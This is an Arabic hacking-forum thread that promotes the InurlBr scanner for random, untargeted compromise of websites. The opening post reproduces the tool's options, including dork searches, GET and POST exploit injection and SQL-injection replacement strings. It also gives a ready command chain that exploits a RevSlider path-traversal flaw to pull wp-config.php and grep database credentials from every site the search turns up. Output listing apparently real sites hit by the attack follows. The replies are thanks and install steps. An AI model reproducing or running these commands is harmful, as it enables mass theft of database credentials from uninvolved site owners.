[ أداة ] [ InurlBr ]

الموضوع في 'قسم الأدوات' بواسطة AnonYmous-IQ, بتاريخ ‏8 فبراير 2015.

الوسوم:
  1. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    [​IMG]
    [​IMG]




    :ُeُe0W: كيف الحال يا رب الكل بخير ً#ٌ5oًًًُ.


    وبصحة وعافية :ُxe@:

    [​IMG]


    [ InurlBr ]


    أداة جبارة تفوقت على باقي الادوات بوقتها الحالي :ُeُek:


    [​IMG]


    [​IMG]


    برمجة الاداة _ البرازيل _


    تخصصت الاداة في احضار مواقع مصابة عشوائية

    سحب الكونفك عن طريق ثغرات الخ.....


    Help


    كود PHP:

     ______   __  __  __  __  ____    __       ____     ____       
    /\__  _\ /\ \/\ \/\ \/\ \/\  _`\ /\ \     /\  _`\  /\  _`\     \/_/\ \/ \ \ `\ \ \ \ \ \ \ \L\ \ \ \    \ \ \L\ \ \ \L\ \      \ \ \  \ \ , ` \ \ \ \ \ \ ,  /\ \ \  __\ \  _ <'\ \ ,  /       \_\ \__\ \ \`\ \ \ \_\ \ \ \ \ \ \L\ \ \ \L\ \ \ \ \      /\_____\ \_\ \_\ \_____\ \_\ \_\ \____/ \ \____/ \ \_\ \_\    \/_____/ \/_/\/_/\/_____/\/_/\/ /\/___/   \/___/   \/_/\/ /         _    _ ______ _      _____  | |  | |  ____| |    |  __ \| |__| | |__  | |    | |__) ||  __  |  __| | |    |  ___/| |  | | |____| |____| |    |_|  |_|______|______|_|                      -----------------------------------------------------------------------------------------------------------------------------------h--help   Alternative long length help command.--ajuda  Command to specify Help.--info   Information script. -q  Choose which search engine you want through [1...13]:     [options]:     1   - www.google.com     2   - www.bing.com     3   - br.search.yahoo.com     4   - www.ask.com     5   - search.hao123.com     6   - ajax.googleapis.com     7   - search.lycos.com     8   - busca.uol.com     9   - us.yhs4.search.yahoo.com     10  - pesquisa.sapo.pt     11  - www.dmoz.org     12  - www.gigablast.com     13  - web.search.naver.com     all - All search engines     Default:    1     Example: -q {op}     Usage:   -q 1              -q 5               Using more than one engine:  -q 1,2,5,6,11               Using all engines:      -q all      -p  Choose which proxy you want to use through the search engine:     Example: -p {proxy:port}     Usage:   -p localhost:8118              -p socks5:[email protected]:9050              -p http://admin:[email protected]:8080   --tor-random Enables the TOR function, each usage links an unique IP.  -t  Choose the validation type: op 1, 2, 3     [options]:     1   - The first type uses default errors considering the script:     It establishes connection with the exploit through the get method.     demonstrativo: www.alvo.com/pasta/index.php?id={exploit}        2   -  The second type tries to valid the error defined by: -a='ALGO_DENTRO_ALVO'     It also establishes connection with the exploit through the get method     demonstrativo: www.alvo.com/pasta/index.php?id={exploit}        3   - The third type combine both first and second types:     Then, of course, it also establishes connection with the exploit through the get method     Demo: www.alvo.com{exploit}     Default:    1     Example: -t {op}     Usage:   -t 1          DEFAULT ERRORS:       CMS WORDPRESS, JDBC ERROR, MYSQL ERROR, MICROSOFT ERROR, ORACLE ERROR, POSTGRESQL ERROR,     ZEND FRAMEWORK ERROR, PHP ERROR, ASP ERROR, LUA ERROR, INDEFINITE ERROR    --dork Defines which dork the search engine will use.     Example: --dork {dork}     Usage:   --dork 'site:.gov.br inurl:php? id'     - Using multiples dorks:     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'  --exploit-get Defines which exploit will be injected through the GET method to each URL found.     Example: --exploit-get {exploit_get}     Usage:   --exploit-get '?´0x27;'      --exploit-post Defines which exploit will be injected through the POST method to each URL found.     Example: --exploit-post {exploit_post}     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'      --exploit-comand Defines which exploit/parameter will be executed in the options: --comand-vul/--comand-all.       The exploit-comand will be identified by the paramaters: --comand-vul/--comand-all como _EXPLOIT_             Ex --exploit-comand '/admin/config.conf' --comand-all 'curl -v _TARGET__EXPLOIT_'     _TARGET_ is the specified URL/TARGET obtained by the process     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-comand.     Example: --exploit-comand {exploit-comand}     Usage:   --exploit-comand '/admin/config.conf'          -a  Specify the string that will be used on the search script:     Example: -a {string}     Usage:   -a '<title>hello world</title>'      -d  Specify the script usage op 1, 2, 3, 4, 5, 6.     Example: -d {op}     Usage:     -d 1 /URL of the search engine.              -d 2 /Show all the url.              -d 3 /Detailed request of every URL.              -d 4 /Shows the HTML of every URL.              -d 5 /Detailed request of all URLs.              -s  Specify the output file where it will be saved the vulnerable URLs.          Example: -s {file}     Usage:   -s your_file.txt      -o  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.     Example: -o {file_where_my_urls_are}     Usage:   -o tests.txt  -m  Enable the search for emails on the urls specified.        -u  Enables the search for URL lists on the url specified.  --gc Enable validation of values ​​with google webcache.  --cms-check Enable simple check if the url / target is using CMS

     --comand-vul Every vulnerable URL found will execute this command parameters.     Example: --comand-vul {command}     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'              --comand-vul './exploit.sh _TARGET_ output.txt'              --comand-all Use this commmand to specify a single command to EVERY URL found.     Example: --comand-all {command}     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'              --comand-all './exploit.sh _TARGET_ output.txt'                 Observation:       _TARGET_ will be replaced by the URL/target found, although if the user      doesn't input the get, only the domain will be executed.      _TARGETFULL_ will be replaced by the original URL / target found.      _EXPLOIT_  will be replaced by the specified command argument --exploit-comand.   The exploit-comand will be identified by the parameters --comand-vul / --comand-all as _EXPLOIT_
     --replace Replace values ​​in the target URL.    Example:  --replace {value_old[INURL]value_new}     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'
    [​IMG]

    Info


    [​IMG]



    [​IMG]



    مثلأ خلونا نستغل الثغرة للاختراق العشوائي مو الاسهداف


    [NOTE]

    Poc: /wp-admin/admin-ajax.php?action=revslide*r_show_image&img=../wp-config.php


    inurl:wp-content/plugins/revslider site:br

    [/NOTE]



    عن طريق هل امر

    [NOTE]

    INURLBR ADVANCED CONTROL


    php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

    [/NOTE]


    النتيجة



    [NOTE]
    Index of /wp-content/plugins/revslider/js GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Folkes Heating and Cooling GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/inc_php GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/inc_php GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Home | Luciano Restaurants GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/temp/update_extract GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    www.redkatana.com/ GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/languages GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    www.gregsafaris.com/ GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    http://weatherpine.com/wp/wp-content/plugins/revslider/css/jui/ GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/views/templates/ GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    PT. GRHA GIRI KENCANA GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/languages GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/languages GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Remedy GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/languages GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/rs-plugin/videojs GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/cache GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/temp/update_extract GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    eVigilsآ® | Secure Messaging & Care Coordination Engine | GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    http://www.335th.com/wp-content/plugins/revslider/error_log GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    335TH | Yours Fittingly GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/cache GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/temp/update_extract/revslider GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Svingen GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    http://bobismakeup.com/wp-content/plugins/revslider/inc_php/php_errorlog GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/rs-plugin/videojs/ GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/css/jui/old/images GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/cache GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


    Index of /wp-content/plugins/revslider/css/jui/new/images GET=> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

    [/NOTE]

    :ُie1:


    الاستغلال

    [YOUTUBE]wAdxznwhKGY[/YOUTUBE]


    للفائدة فقط طرح الفيديو من قبل في المنتدئ .. i:q1^:


    [​IMG]


    للاداة خواص كثيرة استكشفوها {1!$9}


    :ُeُ!e1:


    رابط تحميل الاداة


    [DOWNLOAD]https://github.com/googleinurl/SCANNER-INURLBR[/DOWNLOAD]



    الاداة موجودة في النظام


    Parrot Security OS




    ارجع واقول الاداة تمت برمجتها بقمة الاحترافية وجبارة لحد اقصئ لكن

    العيب الوحيد هو ليست للاداة واجهة رسومية مثل باقي الادوات


    :ُeُek:



    ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ. اختراقات موفقة .... ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.ً#ٌ5oًًًُ.




    [​IMG]
    [​IMG]



     
  2. ThE - 7aFar

    ThE - 7aFar كبار الشخصيات V • I • P

    الأنتساب:
    ‏16 ديسمبر 2014
    المشاركات:
    1,018
    الإعجابات المتلقاة:
    18
    نقاط الجائزة:
    38
    الوظيفة:
    عطـآل - بطـأل
    الإقامة:
    آلـع ـرآق - بـغ ـدآد
    رد: [ InurlBr ]

    سلآم عليكم ورحمة الله وبركاته
    عاشت الايادي صديقي شرح وآفي وكآفي
    بارك الله بيك وجعلة في ميزآن حسنآتك يآ طيب
    و تقبل تحياتي وتقديري لحضرتك

    [​IMG][​IMG]

     
  3. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    رد: [ InurlBr ]

    {1!$7} {1!$7}{1!$7}{1!$7}{1!$7}{1!$7} {1!$7}

    وايدك حبيبي . شكرا لك
    على
    مرورك العطر يا عسل
    نورت الموضوع غلاية انت
    [​IMG]

    {1!$7} {1!$7}{1!$7}{1!$7}{1!$7}{1!$7} {1!$7}​
     
  4. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: [ InurlBr ]

    بارك الله بك ياطيب
    اداة جبارة
    ان شاء الله سأقوم بتجربة ما اذا كان من الممكن تثبيتها على الكالي
     
  5. Mr.FriezA

    Mr.FriezA V • I • P

    الأنتساب:
    ‏10 مارس 2014
    المشاركات:
    552
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    18
    الجنس:
    ذكر
    الإقامة:
    افضل و اطهر بقاع الارض
    رد: [ InurlBr ]

    تسلم عل طرح الاداه ^_^ انا استعمل هذذا النظام ومادري انه من جد فيه اداوت زي ذا والله تسلم حبي على الاداه
     
  6. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    رد: [ InurlBr ]

    {1!$7}وبيك حبيبي ....MR.CAPTCHA.... شكرآ على مرورك يا احلى من العسل انت هههـ [​IMG]



    الاداة قابلة للتنصيب على اي نظام لينكس

    لو تعمقت اكثر راح تلاحظ المتطلبات ياالطيب



    • ----------------------------------------------------------
    • [+] PERMISSION EXECUTION: chmod +x inurlbr.php
    • [+] INSTALLING LIB CURL: sudo apt-get install php5-curl
    • [+] INSTALLING LIB CLI: sudo apt-get install php5-cli
    • [+] INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en
    • ----------------------------------------------------------

    :{8!}:​
    :{8!}::{8!}::{8!}::{8!}::{8!}::{8!}::{8!}:​
     
  7. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    رد: [ InurlBr ]

    {1!$8} نورت يالطيب ... MR.FRIEZA... {1!$8}

    {1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}​
     
  8. security alqasem

    security alqasem موقوف لمخالفة الشروط

    الأنتساب:
    ‏26 مايو 2014
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    المخالفات
    3
    رد: [ InurlBr ]

    عاشت ايدك
    دائما مبدع
    :{1!}:{1!$7}:{1!}:{1!$7}:{1!}:{1!$7}:{1!}:{1!$7}
     
  9. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    رد: [ InurlBr ]

    [​IMG] , وايدكـ حبيبي شكرآ على مرورك العطر يا وردة {1!$7}​
     
  10. wadedy

    wadedy Developer

    الأنتساب:
    ‏2 يونيو 2014
    المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: [ InurlBr ]

    راااااااائع يا صديقي شرح منظم اعجبني كثيرا
     

مشاركة هذه الصفحة